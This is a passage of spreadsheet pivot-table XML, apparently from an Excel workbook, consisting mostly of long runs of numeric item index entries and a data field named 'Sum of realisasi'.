        <item x="188"/>
        <item x="1218"/>
        <item x="8"/>
        <item x="539"/>
        <item x="149"/>
        <item x="683"/>
        <item x="41"/>
        <item x="657"/>
        <item x="642"/>
        <item x="647"/>
        <item x="629"/>
        <item x="199"/>
        <item x="391"/>
        <item x="920"/>
        <item x="654"/>
        <item x="437"/>
        <item x="663"/>
        <item x="568"/>
        <item x="1158"/>
        <item x="62"/>
        <item x="471"/>
        <item x="308"/>
        <item x="573"/>
        <item x="1162"/>
        <item x="389"/>
        <item x="626"/>
        <item x="337"/>
        <item x="85"/>
        <item x="23"/>
        <item x="998"/>
        <item x="526"/>
        <item x="692"/>
        <item x="477"/>
        <item x="1207"/>
        <item x="64"/>
        <item x="688"/>
        <item x="844"/>
        <item x="745"/>
        <item x="931"/>
        <item x="710"/>
        <item x="228"/>
        <item x="235"/>
        <item x="16"/>
        <item x="438"/>
        <item x="529"/>
        <item x="576"/>
        <item x="599"/>
        <item x="302"/>
        <item x="709"/>
        <item x="714"/>
        <item x="1185"/>
        <item x="68"/>
        <item x="342"/>
        <item x="1212"/>
        <item x="1254"/>
        <item x="859"/>
        <item x="883"/>
        <item x="465"/>
        <item x="623"/>
        <item x="606"/>
        <item x="1060"/>
        <item x="242"/>
        <item x="495"/>
        <item x="760"/>
        <item x="722"/>
        <item x="324"/>
        <item x="1255"/>
        <item x="987"/>
        <item x="719"/>
        <item x="103"/>
        <item x="146"/>
        <item x="296"/>
        <item x="611"/>
        <item x="718"/>
        <item x="908"/>
        <item x="914"/>
        <item x="83"/>
        <item x="653"/>
        <item x="744"/>
        <item x="400"/>
        <item x="586"/>
        <item x="748"/>
        <item x="687"/>
        <item x="498"/>
        <item x="106"/>
        <item x="1051"/>
        <item x="658"/>
        <item x="72"/>
        <item x="706"/>
        <item x="294"/>
        <item x="609"/>
        <item x="215"/>
        <item x="205"/>
        <item x="185"/>
        <item x="1181"/>
        <item x="862"/>
        <item x="514"/>
        <item x="758"/>
        <item x="762"/>
        <item x="716"/>
        <item x="720"/>
        <item x="1117"/>
        <item x="1070"/>
        <item x="1035"/>
        <item x="197"/>
        <item x="708"/>
        <item x="227"/>
        <item x="848"/>
        <item x="715"/>
        <item x="894"/>
        <item x="777"/>
        <item x="950"/>
        <item x="841"/>
        <item x="831"/>
        <item x="633"/>
        <item x="1015"/>
        <item x="773"/>
        <item x="624"/>
        <item x="828"/>
        <item x="696"/>
        <item x="336"/>
        <item x="751"/>
        <item x="809"/>
        <item x="1160"/>
        <item x="690"/>
        <item x="789"/>
        <item x="817"/>
        <item x="385"/>
        <item x="343"/>
        <item x="195"/>
        <item x="763"/>
        <item x="747"/>
        <item x="82"/>
        <item x="988"/>
        <item x="849"/>
        <item x="679"/>
        <item x="334"/>
        <item x="691"/>
        <item x="1021"/>
        <item x="1116"/>
        <item x="1004"/>
        <item x="671"/>
        <item x="252"/>
        <item x="607"/>
        <item x="1067"/>
        <item x="1032"/>
        <item x="555"/>
        <item x="790"/>
        <item x="711"/>
        <item x="892"/>
        <item x="721"/>
        <item x="903"/>
        <item x="681"/>
        <item x="770"/>
        <item x="473"/>
        <item x="233"/>
        <item x="887"/>
        <item x="1237"/>
        <item x="890"/>
        <item x="877"/>
        <item x="997"/>
        <item x="111"/>
        <item x="990"/>
        <item x="45"/>
        <item x="928"/>
        <item x="375"/>
        <item x="785"/>
        <item x="1057"/>
        <item x="774"/>
        <item x="81"/>
        <item x="1075"/>
        <item x="807"/>
        <item x="812"/>
        <item x="144"/>
        <item x="723"/>
        <item x="944"/>
        <item x="856"/>
        <item x="815"/>
        <item x="56"/>
        <item x="545"/>
        <item x="863"/>
        <item x="1007"/>
        <item x="915"/>
        <item x="983"/>
        <item x="1048"/>
        <item x="1063"/>
        <item x="1064"/>
        <item x="672"/>
        <item x="603"/>
        <item x="973"/>
        <item x="916"/>
        <item x="345"/>
        <item x="939"/>
        <item x="388"/>
        <item x="684"/>
        <item x="948"/>
        <item x="966"/>
        <item x="924"/>
        <item x="668"/>
        <item x="899"/>
        <item x="597"/>
        <item x="952"/>
        <item x="896"/>
        <item x="340"/>
        <item x="1079"/>
        <item x="1163"/>
        <item x="871"/>
        <item x="1198"/>
        <item x="1056"/>
        <item x="1049"/>
        <item x="1011"/>
        <item x="797"/>
        <item x="838"/>
        <item x="1055"/>
        <item x="926"/>
        <item x="905"/>
        <item x="1044"/>
        <item x="1165"/>
        <item x="1010"/>
        <item x="955"/>
        <item x="1026"/>
        <item x="231"/>
        <item x="1104"/>
        <item x="1016"/>
        <item x="917"/>
        <item x="942"/>
        <item x="320"/>
        <item x="735"/>
        <item x="943"/>
        <item x="1006"/>
        <item x="1211"/>
        <item x="919"/>
        <item x="428"/>
        <item x="938"/>
        <item x="1058"/>
        <item x="891"/>
        <item x="1257"/>
        <item x="909"/>
        <item x="1129"/>
        <item x="95"/>
        <item x="1001"/>
        <item x="875"/>
        <item x="1020"/>
        <item x="584"/>
        <item x="1121"/>
        <item x="592"/>
        <item x="475"/>
        <item x="480"/>
        <item x="963"/>
        <item x="528"/>
        <item x="1153"/>
        <item x="116"/>
        <item x="1062"/>
        <item x="1232"/>
        <item x="1041"/>
        <item x="1023"/>
        <item x="241"/>
        <item x="126"/>
        <item x="1014"/>
        <item x="958"/>
        <item x="1106"/>
        <item x="736"/>
        <item x="1094"/>
        <item x="1144"/>
        <item x="1038"/>
        <item x="249"/>
        <item x="1005"/>
        <item x="907"/>
        <item x="1235"/>
        <item x="530"/>
        <item x="276"/>
        <item x="1078"/>
        <item x="999"/>
        <item x="1090"/>
        <item x="625"/>
        <item x="1135"/>
        <item x="995"/>
        <item x="1000"/>
        <item x="1033"/>
        <item x="524"/>
        <item x="778"/>
        <item x="1151"/>
        <item x="1047"/>
        <item x="177"/>
        <item x="1096"/>
        <item x="1091"/>
        <item x="419"/>
        <item x="397"/>
        <item x="376"/>
        <item x="246"/>
        <item x="949"/>
        <item x="499"/>
        <item x="347"/>
        <item x="1184"/>
        <item x="329"/>
        <item x="1227"/>
        <item x="1143"/>
        <item x="996"/>
        <item x="1046"/>
        <item x="478"/>
        <item x="287"/>
        <item x="1126"/>
        <item x="148"/>
        <item x="1157"/>
        <item x="1199"/>
        <item x="1092"/>
        <item x="1080"/>
        <item x="1246"/>
        <item x="1180"/>
        <item x="1034"/>
        <item x="522"/>
        <item x="1105"/>
        <item x="1182"/>
        <item x="886"/>
        <item x="1214"/>
        <item x="194"/>
        <item x="69"/>
        <item x="682"/>
        <item x="176"/>
        <item x="1197"/>
        <item x="1108"/>
        <item x="1120"/>
        <item x="1191"/>
        <item x="1168"/>
        <item x="453"/>
        <item x="1240"/>
        <item x="1150"/>
        <item x="335"/>
        <item x="724"/>
        <item x="1134"/>
        <item x="1231"/>
        <item x="678"/>
        <item x="1202"/>
        <item x="1209"/>
        <item x="1238"/>
        <item x="470"/>
        <item x="482"/>
        <item x="978"/>
        <item x="107"/>
        <item x="595"/>
        <item x="1111"/>
        <item x="932"/>
        <item x="392"/>
        <item x="888"/>
        <item x="594"/>
        <item x="163"/>
        <item x="96"/>
        <item x="1269"/>
        <item x="264"/>
        <item x="496"/>
        <item x="183"/>
        <item x="689"/>
        <item x="750"/>
        <item x="1137"/>
        <item x="70"/>
        <item x="506"/>
        <item x="3"/>
        <item x="9"/>
        <item x="686"/>
        <item x="836"/>
        <item x="628"/>
        <item x="331"/>
        <item x="455"/>
        <item x="488"/>
        <item x="318"/>
        <item x="445"/>
        <item x="464"/>
        <item x="58"/>
        <item x="210"/>
        <item x="511"/>
        <item x="510"/>
        <item x="396"/>
        <item x="200"/>
        <item x="481"/>
        <item x="870"/>
        <item x="394"/>
        <item x="117"/>
        <item x="630"/>
        <item x="265"/>
        <item x="837"/>
        <item x="355"/>
        <item x="459"/>
        <item x="270"/>
        <item x="467"/>
        <item x="1263"/>
        <item x="1069"/>
        <item x="38"/>
        <item x="854"/>
        <item x="1112"/>
        <item x="157"/>
        <item x="377"/>
        <item x="330"/>
        <item x="289"/>
        <item x="452"/>
        <item x="1173"/>
        <item x="444"/>
        <item x="509"/>
        <item x="1076"/>
        <item x="536"/>
        <item x="285"/>
        <item x="502"/>
        <item x="344"/>
        <item x="1247"/>
        <item x="1148"/>
        <item x="1036"/>
        <item x="271"/>
        <item x="489"/>
        <item x="468"/>
        <item x="766"/>
        <item x="655"/>
        <item x="288"/>
        <item x="759"/>
        <item x="1203"/>
        <item x="460"/>
        <item x="517"/>
        <item x="317"/>
        <item x="415"/>
        <item x="143"/>
        <item x="505"/>
        <item x="582"/>
        <item x="32"/>
        <item x="370"/>
        <item x="1125"/>
        <item x="125"/>
        <item x="417"/>
        <item x="218"/>
        <item x="255"/>
        <item x="27"/>
        <item x="267"/>
        <item x="430"/>
        <item x="180"/>
        <item x="420"/>
        <item x="390"/>
        <item x="485"/>
        <item x="466"/>
        <item x="278"/>
        <item x="501"/>
        <item x="142"/>
        <item x="12"/>
        <item x="461"/>
        <item x="263"/>
        <item x="213"/>
        <item x="503"/>
        <item x="853"/>
        <item x="504"/>
        <item x="100"/>
        <item x="579"/>
        <item x="491"/>
        <item x="484"/>
        <item x="462"/>
        <item x="727"/>
        <item x="341"/>
        <item x="476"/>
        <item x="421"/>
        <item x="338"/>
        <item x="497"/>
        <item x="266"/>
        <item x="299"/>
        <item x="429"/>
        <item x="641"/>
        <item x="382"/>
        <item x="490"/>
        <item x="268"/>
        <item x="1260"/>
        <item x="492"/>
        <item x="114"/>
        <item x="39"/>
        <item x="361"/>
        <item x="166"/>
        <item x="729"/>
        <item x="181"/>
        <item x="113"/>
        <item x="383"/>
        <item x="160"/>
        <item x="486"/>
        <item x="339"/>
        <item x="202"/>
        <item x="112"/>
        <item x="325"/>
        <item x="243"/>
        <item x="192"/>
        <item x="198"/>
        <item x="962"/>
        <item x="66"/>
        <item x="639"/>
        <item x="131"/>
        <item x="1109"/>
        <item x="63"/>
        <item x="203"/>
        <item x="305"/>
        <item x="412"/>
        <item x="275"/>
        <item x="371"/>
        <item x="274"/>
        <item x="367"/>
        <item x="244"/>
        <item x="407"/>
        <item x="346"/>
        <item x="312"/>
        <item x="290"/>
        <item x="230"/>
        <item x="60"/>
        <item x="155"/>
        <item x="413"/>
        <item x="97"/>
        <item x="172"/>
        <item x="99"/>
        <item x="15"/>
        <item x="40"/>
        <item x="326"/>
        <item x="145"/>
        <item x="286"/>
        <item x="237"/>
        <item x="443"/>
        <item x="33"/>
        <item x="411"/>
        <item x="309"/>
        <item x="333"/>
        <item x="311"/>
        <item x="35"/>
        <item x="442"/>
        <item x="29"/>
        <item x="879"/>
        <item x="298"/>
        <item x="25"/>
        <item x="24"/>
        <item x="238"/>
        <item x="697"/>
        <item x="416"/>
        <item x="303"/>
        <item x="725"/>
        <item x="447"/>
        <item x="101"/>
        <item x="448"/>
        <item x="4"/>
        <item x="250"/>
        <item x="61"/>
        <item x="327"/>
        <item x="277"/>
        <item x="169"/>
        <item x="80"/>
        <item x="71"/>
        <item x="130"/>
        <item x="48"/>
        <item x="456"/>
        <item x="366"/>
        <item x="300"/>
        <item x="14"/>
        <item x="65"/>
        <item x="136"/>
        <item x="525"/>
        <item x="1133"/>
        <item x="30"/>
        <item x="363"/>
        <item x="5"/>
        <item x="449"/>
        <item x="89"/>
        <item x="119"/>
        <item x="349"/>
        <item x="154"/>
        <item x="405"/>
        <item x="351"/>
        <item x="1159"/>
        <item x="348"/>
        <item x="196"/>
        <item x="186"/>
        <item x="43"/>
        <item x="0"/>
        <item x="319"/>
        <item x="6"/>
        <item x="164"/>
        <item x="458"/>
        <item x="439"/>
        <item x="182"/>
        <item x="74"/>
        <item x="552"/>
        <item x="22"/>
        <item x="229"/>
        <item x="221"/>
        <item x="521"/>
        <item x="184"/>
        <item x="767"/>
        <item x="152"/>
        <item x="92"/>
        <item x="102"/>
        <item x="661"/>
        <item x="350"/>
        <item x="239"/>
        <item x="409"/>
        <item x="272"/>
        <item x="17"/>
        <item x="49"/>
        <item x="743"/>
        <item x="864"/>
        <item x="307"/>
        <item x="1031"/>
        <item x="133"/>
        <item x="353"/>
        <item x="543"/>
        <item x="554"/>
        <item x="796"/>
        <item x="322"/>
        <item x="457"/>
        <item x="204"/>
        <item x="108"/>
        <item x="378"/>
        <item x="406"/>
        <item x="660"/>
        <item x="86"/>
        <item x="129"/>
        <item x="393"/>
        <item x="422"/>
        <item x="110"/>
        <item x="540"/>
        <item x="541"/>
        <item x="46"/>
        <item x="321"/>
        <item x="451"/>
        <item x="782"/>
        <item x="20"/>
        <item x="794"/>
        <item x="253"/>
        <item x="284"/>
        <item x="423"/>
        <item x="852"/>
        <item x="560"/>
        <item x="580"/>
        <item x="323"/>
        <item x="224"/>
        <item x="885"/>
        <item x="168"/>
        <item x="547"/>
        <item x="520"/>
        <item x="310"/>
        <item x="222"/>
        <item x="427"/>
        <item x="189"/>
        <item x="1149"/>
        <item x="519"/>
        <item x="749"/>
        <item x="835"/>
        <item x="282"/>
        <item x="581"/>
        <item x="141"/>
        <item x="109"/>
        <item x="544"/>
        <item x="167"/>
        <item x="121"/>
        <item x="572"/>
        <item x="18"/>
        <item x="403"/>
        <item x="695"/>
        <item x="261"/>
        <item x="598"/>
        <item x="372"/>
        <item x="650"/>
        <item x="659"/>
        <item x="187"/>
        <item x="365"/>
        <item x="538"/>
        <item x="587"/>
        <item x="665"/>
        <item x="59"/>
        <item x="569"/>
        <item x="588"/>
        <item x="527"/>
        <item x="816"/>
        <item x="614"/>
        <item x="700"/>
        <item x="558"/>
        <item x="549"/>
        <item x="548"/>
        <item x="561"/>
        <item x="577"/>
        <item x="1068"/>
        <item x="615"/>
        <item x="602"/>
        <item x="534"/>
        <item x="604"/>
        <item x="900"/>
        <item x="1217"/>
        <item x="618"/>
        <item x="616"/>
        <item x="667"/>
        <item x="563"/>
        <item x="557"/>
        <item x="571"/>
        <item x="578"/>
        <item x="589"/>
        <item x="574"/>
        <item x="680"/>
        <item x="698"/>
        <item x="703"/>
        <item x="585"/>
        <item x="612"/>
        <item x="651"/>
        <item x="619"/>
        <item x="601"/>
        <item x="674"/>
        <item x="693"/>
        <item x="717"/>
        <item x="622"/>
        <item x="610"/>
        <item x="613"/>
        <item x="608"/>
        <item x="636"/>
        <item x="937"/>
        <item x="740"/>
        <item x="605"/>
        <item x="734"/>
        <item x="621"/>
        <item x="627"/>
        <item x="923"/>
        <item x="648"/>
        <item x="730"/>
        <item x="632"/>
        <item x="631"/>
        <item x="772"/>
        <item x="795"/>
        <item x="645"/>
        <item x="649"/>
        <item x="771"/>
        <item x="637"/>
        <item x="702"/>
        <item x="675"/>
        <item x="646"/>
        <item x="768"/>
        <item x="784"/>
        <item x="669"/>
        <item x="662"/>
        <item x="872"/>
        <item x="808"/>
        <item x="713"/>
        <item x="676"/>
        <item x="733"/>
        <item x="685"/>
        <item x="699"/>
        <item x="707"/>
        <item x="726"/>
        <item x="788"/>
        <item x="792"/>
        <item x="728"/>
        <item x="901"/>
        <item x="810"/>
        <item x="821"/>
        <item x="753"/>
        <item x="731"/>
        <item x="798"/>
        <item x="737"/>
        <item x="818"/>
        <item x="956"/>
        <item x="752"/>
        <item x="1024"/>
        <item x="967"/>
        <item x="775"/>
        <item x="769"/>
        <item x="793"/>
        <item x="786"/>
        <item x="829"/>
        <item x="783"/>
        <item x="779"/>
        <item x="834"/>
        <item x="800"/>
        <item x="806"/>
        <item x="825"/>
        <item x="840"/>
        <item x="804"/>
        <item x="803"/>
        <item x="822"/>
        <item x="813"/>
        <item x="823"/>
        <item x="791"/>
        <item x="1093"/>
        <item x="799"/>
        <item x="906"/>
        <item x="881"/>
        <item x="801"/>
        <item x="1256"/>
        <item x="802"/>
        <item x="846"/>
        <item x="826"/>
        <item x="827"/>
        <item x="1102"/>
        <item x="832"/>
        <item x="869"/>
        <item x="847"/>
        <item x="851"/>
        <item x="830"/>
        <item x="981"/>
        <item x="855"/>
        <item x="845"/>
        <item x="957"/>
        <item x="839"/>
        <item x="893"/>
        <item x="1045"/>
        <item x="833"/>
        <item x="880"/>
        <item x="858"/>
        <item x="865"/>
        <item x="843"/>
        <item x="1072"/>
        <item x="991"/>
        <item x="889"/>
        <item x="873"/>
        <item x="1053"/>
        <item x="868"/>
        <item x="882"/>
        <item x="876"/>
        <item x="1142"/>
        <item x="1169"/>
        <item x="945"/>
        <item x="913"/>
        <item x="934"/>
        <item x="964"/>
        <item x="941"/>
        <item x="1054"/>
        <item x="1176"/>
        <item x="904"/>
        <item x="898"/>
        <item x="1073"/>
        <item x="933"/>
        <item x="929"/>
        <item x="927"/>
        <item x="912"/>
        <item x="1017"/>
        <item x="935"/>
        <item x="982"/>
        <item x="971"/>
        <item x="922"/>
        <item x="953"/>
        <item x="930"/>
        <item x="946"/>
        <item x="947"/>
        <item x="951"/>
        <item x="940"/>
        <item x="936"/>
        <item x="970"/>
        <item x="968"/>
        <item x="974"/>
        <item x="969"/>
        <item x="977"/>
        <item x="1101"/>
        <item x="965"/>
        <item x="1107"/>
        <item x="985"/>
        <item x="1138"/>
        <item x="961"/>
        <item x="1012"/>
        <item x="976"/>
        <item x="972"/>
        <item x="1008"/>
        <item x="1002"/>
        <item x="989"/>
        <item x="980"/>
        <item x="992"/>
        <item x="994"/>
        <item x="993"/>
        <item x="1009"/>
        <item x="1082"/>
        <item x="1115"/>
        <item x="1003"/>
        <item x="1013"/>
        <item x="1113"/>
        <item x="1027"/>
        <item x="1025"/>
        <item x="1052"/>
        <item x="1022"/>
        <item x="1028"/>
        <item x="1059"/>
        <item x="1123"/>
        <item x="1156"/>
        <item x="1037"/>
        <item x="1100"/>
        <item x="1071"/>
        <item x="1127"/>
        <item x="1155"/>
        <item x="1095"/>
        <item x="1215"/>
        <item x="1039"/>
        <item x="1040"/>
        <item x="1141"/>
        <item x="1089"/>
        <item x="1061"/>
        <item x="1140"/>
        <item x="1110"/>
        <item x="1097"/>
        <item x="1074"/>
        <item x="1243"/>
        <item x="1122"/>
        <item x="1124"/>
        <item x="1065"/>
        <item x="1099"/>
        <item x="1188"/>
        <item x="1083"/>
        <item x="1086"/>
        <item x="1087"/>
        <item x="1088"/>
        <item x="1081"/>
        <item x="1166"/>
        <item x="1103"/>
        <item x="1234"/>
        <item x="1098"/>
        <item x="1118"/>
        <item x="1145"/>
        <item x="1132"/>
        <item x="1189"/>
        <item x="1130"/>
        <item x="1128"/>
        <item x="1154"/>
        <item x="1119"/>
        <item x="1139"/>
        <item x="1146"/>
        <item x="1161"/>
        <item x="1147"/>
        <item x="1172"/>
        <item x="1183"/>
        <item x="1171"/>
        <item x="1258"/>
        <item x="1266"/>
        <item x="1233"/>
        <item x="1187"/>
        <item x="1164"/>
        <item x="1178"/>
        <item x="1177"/>
        <item x="1221"/>
        <item x="1208"/>
        <item x="1170"/>
        <item x="1193"/>
        <item x="1222"/>
        <item x="1175"/>
        <item x="1194"/>
        <item x="1174"/>
        <item x="1201"/>
        <item x="1196"/>
        <item x="1186"/>
        <item x="1223"/>
        <item x="1200"/>
        <item x="1195"/>
        <item x="1267"/>
        <item x="1192"/>
        <item x="1228"/>
        <item x="1216"/>
        <item x="1204"/>
        <item x="1219"/>
        <item x="1220"/>
        <item x="1206"/>
        <item x="1205"/>
        <item x="1251"/>
        <item x="1210"/>
        <item x="1213"/>
        <item x="1229"/>
        <item x="1226"/>
        <item x="1225"/>
        <item x="1253"/>
        <item x="1248"/>
        <item x="1224"/>
        <item x="1241"/>
        <item x="1245"/>
        <item x="1244"/>
        <item x="1239"/>
        <item x="1252"/>
        <item x="1259"/>
        <item x="1242"/>
        <item x="1265"/>
        <item x="1249"/>
        <item x="1250"/>
        <item x="1262"/>
        <item x="1261"/>
        <item x="1264"/>
        <item x="126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s>
  <rowFields count="1">
    <field x="1"/>
  </rowFields>
  <rowItems count="12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rowItems>
  <colItems count="1">
    <i/>
  </colItems>
  <dataFields count="1">
    <dataField name="Sum of realisasi"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909EDB-DCDE-E240-A601-4BA1CEB7AF8F}"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5592" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="3">
    <pivotField axis="axisRow" showAll="0">
      <items count="5589">
        <item x="4416"/>
        <item x="0"/>
        <item x="1"/>
        <item x="2"/>
        <item x="3"/>
        <item x="4"/>
        <item x="5"/>
        <item x="6"/>
        <item x="7"/>
        <item x="8"/>
        <item x="9"/>
        <item x="10"/>
        <item x="11"/>
        <item x="12"/>
        <item x="13"/>
        <item x="14"/>
        <item x="15"/>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3"/>
        <item x="274"/>
        <item x="275"/>
        <item x="276"/>
        <item x="277"/>
        <item x="278"/>
        <item x="279"/>
        <item x="280"/>
        <item x="281"/>
        <item x="282"/>
        <item x="283"/>
        <item x="284"/>
        <item x="285"/>
        <item x="286"/>
        <item x="287"/>
        <item x="288"/>
        <item x="289"/>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2"/>
        <item x="413"/>
        <item x="414"/>
        <item x="415"/>
        <item x="416"/>
        <item x="417"/>
        <item x="418"/>
        <item x="419"/>
        <item x="421"/>
        <item x="422"/>
        <item x="423"/>
        <item x="424"/>
        <item x="425"/>
        <item x="426"/>
        <item x="427"/>
        <item x="428"/>
        <item x="429"/>
        <item x="430"/>
        <item x="431"/>
        <item x="432"/>
        <item x="433"/>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2053"/>
        <item x="477"/>
        <item x="478"/>
        <item x="479"/>
        <item x="480"/>
        <item x="481"/>
        <item x="482"/>
        <item x="483"/>
        <item x="484"/>
        <item x="485"/>
        <item x="486"/>
        <item x="487"/>
        <item x="488"/>
        <item x="489"/>
        <item x="490"/>
        <item x="491"/>
        <item x="492"/>
        <item x="493"/>
        <item x="494"/>
        <item x="495"/>
        <item x="496"/>
        <item x="497"/>
        <item x="498"/>
        <item x="499"/>
        <item x="500"/>
        <item x="501"/>
        <item x="502"/>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80"/>
        <item x="581"/>
        <item x="582"/>
        <item x="583"/>
        <item x="584"/>
        <item x="585"/>
        <item x="586"/>
        <item x="587"/>
        <item x="588"/>
        <item x="589"/>
        <item x="590"/>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4"/>
        <item x="645"/>
        <item x="646"/>
        <item x="647"/>
        <item x="648"/>
        <item x="649"/>
        <item x="650"/>
        <item x="651"/>
        <item x="652"/>
        <item x="654"/>
        <item x="655"/>
        <item x="656"/>
        <item x="657"/>
        <item x="658"/>
        <item x="659"/>
        <item x="660"/>
        <item x="661"/>
        <item x="663"/>
        <item x="664"/>
        <item x="665"/>
        <item x="666"/>
        <item x="667"/>
        <item x="668"/>
        <item x="669"/>
        <item x="670"/>
        <item x="671"/>
        <item x="672"/>
        <item x="673"/>
        <item x="674"/>
        <item x="676"/>
        <item x="677"/>
        <item x="678"/>
        <item x="679"/>
        <item x="680"/>
        <item x="681"/>
        <item x="682"/>
        <item x="683"/>
        <item x="684"/>
        <item x="685"/>
        <item x="686"/>
        <item x="687"/>
        <item x="688"/>
        <item x="689"/>
        <item x="690"/>
        <item x="691"/>
        <item x="692"/>
        <item x="693"/>
        <item x="694"/>
        <item x="695"/>
        <item x="696"/>
        <item x="697"/>
        <item x="698"/>
        <item x="699"/>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3"/>
        <item x="734"/>
        <item x="735"/>
        <item x="736"/>
        <item x="737"/>
        <item x="738"/>
        <item x="739"/>
        <item x="740"/>
        <item x="741"/>
        <item x="742"/>
        <item x="2051"/>
        <item x="743"/>
        <item x="744"/>
        <item x="745"/>
        <item x="746"/>
        <item x="747"/>
        <item x="748"/>
        <item x="749"/>
        <item x="750"/>
        <item x="751"/>
        <item x="752"/>
        <item x="753"/>
        <item x="754"/>
        <item x="755"/>
        <item x="756"/>
        <item x="757"/>
        <item x="758"/>
        <item x="2159"/>
        <item x="759"/>
        <item x="760"/>
        <item x="761"/>
        <item x="762"/>
        <item x="763"/>
        <item x="764"/>
        <item x="765"/>
        <item x="766"/>
        <item x="767"/>
        <item x="768"/>
        <item x="769"/>
        <item x="770"/>
        <item x="771"/>
        <item x="772"/>
        <item x="773"/>
        <item x="4240"/>
        <item x="774"/>
        <item x="775"/>
        <item x="1950"/>
        <item x="776"/>
        <item x="777"/>
        <item x="778"/>
        <item x="779"/>
        <item x="780"/>
        <item x="781"/>
        <item x="782"/>
        <item x="783"/>
        <item x="784"/>
        <item x="786"/>
        <item x="787"/>
        <item x="788"/>
        <item x="789"/>
        <item x="790"/>
        <item x="791"/>
        <item x="792"/>
        <item x="793"/>
        <item x="794"/>
        <item x="795"/>
        <item x="796"/>
        <item x="797"/>
        <item x="798"/>
        <item x="799"/>
        <item x="800"/>
        <item x="801"/>
        <item x="802"/>
        <item x="803"/>
        <item x="804"/>
        <item x="805"/>
        <item x="806"/>
        <item x="807"/>
        <item x="809"/>
        <item x="810"/>
        <item x="811"/>
        <item x="812"/>
        <item x="813"/>
        <item x="814"/>
        <item x="815"/>
        <item x="816"/>
        <item x="817"/>
        <item x="4361"/>
        <item x="818"/>
        <item x="819"/>
        <item x="820"/>
        <item x="821"/>
        <item x="822"/>
        <item x="823"/>
        <item x="824"/>
        <item x="825"/>
        <item x="826"/>
        <item x="827"/>
        <item x="828"/>
        <item x="829"/>
        <item x="830"/>
        <item x="831"/>
        <item x="832"/>
        <item x="833"/>
        <item x="834"/>
        <item x="835"/>
        <item x="836"/>
        <item x="837"/>
        <item x="4263"/>
        <item x="838"/>
        <item x="839"/>
        <item x="840"/>
        <item x="841"/>
        <item x="842"/>
        <item x="843"/>
        <item x="844"/>
        <item x="845"/>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2199"/>
        <item x="885"/>
        <item x="886"/>
        <item x="5584"/>
        <item x="887"/>
        <item x="888"/>
        <item x="889"/>
        <item x="890"/>
        <item x="891"/>
        <item x="892"/>
        <item x="893"/>
        <item x="894"/>
        <item x="895"/>
        <item x="896"/>
        <item x="897"/>
        <item x="898"/>
        <item x="899"/>
        <item x="900"/>
        <item x="901"/>
        <item x="5131"/>
        <item x="902"/>
        <item x="903"/>
        <item x="904"/>
        <item x="905"/>
        <item x="906"/>
        <item x="907"/>
        <item x="908"/>
        <item x="909"/>
        <item x="910"/>
        <item x="911"/>
        <item x="912"/>
        <item x="913"/>
        <item x="914"/>
        <item x="915"/>
        <item x="916"/>
        <item x="917"/>
        <item x="918"/>
        <item x="919"/>
        <item x="920"/>
        <item x="921"/>
        <item x="922"/>
        <item x="923"/>
        <item x="925"/>
        <item x="926"/>
        <item x="927"/>
        <item x="928"/>
        <item x="929"/>
        <item x="930"/>
        <item x="931"/>
        <item x="932"/>
        <item x="933"/>
        <item x="934"/>
        <item x="935"/>
        <item x="4441"/>
        <item x="936"/>
        <item x="937"/>
        <item x="938"/>
        <item x="939"/>
        <item x="940"/>
        <item x="941"/>
        <item x="942"/>
        <item x="943"/>
        <item x="944"/>
        <item x="945"/>
        <item x="946"/>
        <item x="947"/>
        <item x="948"/>
        <item x="949"/>
        <item x="4446"/>
        <item x="950"/>
        <item x="951"/>
        <item x="2134"/>
        <item x="952"/>
        <item x="953"/>
        <item x="954"/>
        <item x="955"/>
        <item x="956"/>
        <item x="957"/>
        <item x="958"/>
        <item x="959"/>
        <item x="960"/>
        <item x="4343"/>
        <item x="961"/>
        <item x="963"/>
        <item x="964"/>
        <item x="965"/>
        <item x="966"/>
        <item x="967"/>
        <item x="968"/>
        <item x="969"/>
        <item x="970"/>
        <item x="971"/>
        <item x="972"/>
        <item x="973"/>
        <item x="4209"/>
        <item x="974"/>
        <item x="975"/>
        <item x="976"/>
        <item x="977"/>
        <item x="978"/>
        <item x="979"/>
        <item x="980"/>
        <item x="981"/>
        <item x="982"/>
        <item x="983"/>
        <item x="984"/>
        <item x="985"/>
        <item x="986"/>
        <item x="987"/>
        <item x="988"/>
        <item x="989"/>
        <item x="990"/>
        <item x="991"/>
        <item x="992"/>
        <item x="993"/>
        <item x="994"/>
        <item x="995"/>
        <item x="996"/>
        <item x="997"/>
        <item x="998"/>
        <item x="999"/>
        <item x="1000"/>
        <item x="2071"/>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962"/>
        <item x="1067"/>
        <item x="1068"/>
        <item x="1069"/>
        <item x="1070"/>
        <item x="1071"/>
        <item x="1072"/>
        <item x="1073"/>
        <item x="1074"/>
        <item x="1075"/>
        <item x="1076"/>
        <item x="1077"/>
        <item x="1078"/>
        <item x="1079"/>
        <item x="1081"/>
        <item x="2060"/>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4444"/>
        <item x="1109"/>
        <item x="1110"/>
        <item x="1111"/>
        <item x="1112"/>
        <item x="1113"/>
        <item x="1114"/>
        <item x="1115"/>
        <item x="1116"/>
        <item x="1117"/>
        <item x="1118"/>
        <item x="1119"/>
        <item x="1120"/>
        <item x="1121"/>
        <item x="1122"/>
        <item x="1123"/>
        <item x="1124"/>
        <item x="1125"/>
        <item x="1126"/>
        <item x="1127"/>
        <item x="1128"/>
        <item x="1129"/>
        <item x="1130"/>
        <item x="1131"/>
        <item x="2062"/>
        <item x="1132"/>
        <item x="1133"/>
        <item x="1134"/>
        <item x="1135"/>
        <item x="1136"/>
        <item x="1137"/>
        <item x="1976"/>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4618"/>
        <item x="1164"/>
        <item x="1165"/>
        <item x="1166"/>
        <item x="1167"/>
        <item x="1168"/>
        <item x="1169"/>
        <item x="1170"/>
        <item x="1171"/>
        <item x="1172"/>
        <item x="1173"/>
        <item x="1174"/>
        <item x="1175"/>
        <item x="1176"/>
        <item x="1177"/>
        <item x="1178"/>
        <item x="1179"/>
        <item x="1180"/>
        <item x="1181"/>
        <item x="4628"/>
        <item x="1182"/>
        <item x="1183"/>
        <item x="2228"/>
        <item x="1184"/>
        <item x="1185"/>
        <item x="1186"/>
        <item x="1187"/>
        <item x="1188"/>
        <item x="4723"/>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4615"/>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4332"/>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979"/>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2"/>
        <item x="1463"/>
        <item x="1464"/>
        <item x="1465"/>
        <item x="1466"/>
        <item x="1467"/>
        <item x="1468"/>
        <item x="1469"/>
        <item x="1470"/>
        <item x="1471"/>
        <item x="1472"/>
        <item x="1473"/>
        <item x="1474"/>
        <item x="1475"/>
